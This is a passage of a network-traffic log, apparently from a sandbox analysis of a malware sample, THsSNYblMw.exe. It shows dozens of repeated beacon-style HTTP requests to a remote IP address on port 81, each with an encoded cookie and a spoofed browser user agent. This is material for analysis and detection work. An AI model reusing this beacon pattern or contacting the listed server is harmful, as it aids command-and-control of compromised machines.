Jan 9, 2025 23:08:27.726758003 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:28.669912100 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50013	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:28.820888042 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:29.764852047 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50020	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:29.995357990 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:30.945502996 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50026	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:31.072673082 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:32.010430098 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50035	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:32.168989897 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:33.098706007 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50041	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:33.226989031 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:34.161581993 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50050	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:34.322536945 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:35.276041985 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50058	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:35.398664951 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:36.393789053 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50066	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:36.574618101 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:37.566555023 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50075	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:37.694600105 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:38.651248932 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50082	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:38.807920933 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:39.745829105 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50085	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:39.881970882 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:40.858985901 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50086	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:40.992362022 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:41.934221029 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50087	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:42.087651968 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:43.047229052 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50088	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:43.163356066 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:44.102062941 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50089	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:44.290612936 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:45.247185946 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50090	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:45.366745949 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:46.373790026 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50091	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:46.495512009 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:47.489059925 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50092	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:47.601435900 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:48.602277994 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50093	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:48.729087114 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:49.749823093 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50094	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:49.877713919 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:50.826832056 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50095	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:50.945063114 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:51.893944979 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50096	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:52.039577961 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:52.992819071 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50097	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:53.118810892 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:54.053534031 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50098	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:54.163233995 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:55.109482050 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50099	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:55.229773045 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:56.176774025 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50100	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:56.288063049 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:57.253669977 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50101	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:57.366319895 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:58.318607092 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50102	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:58.435591936 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:59.388365984 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50103	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
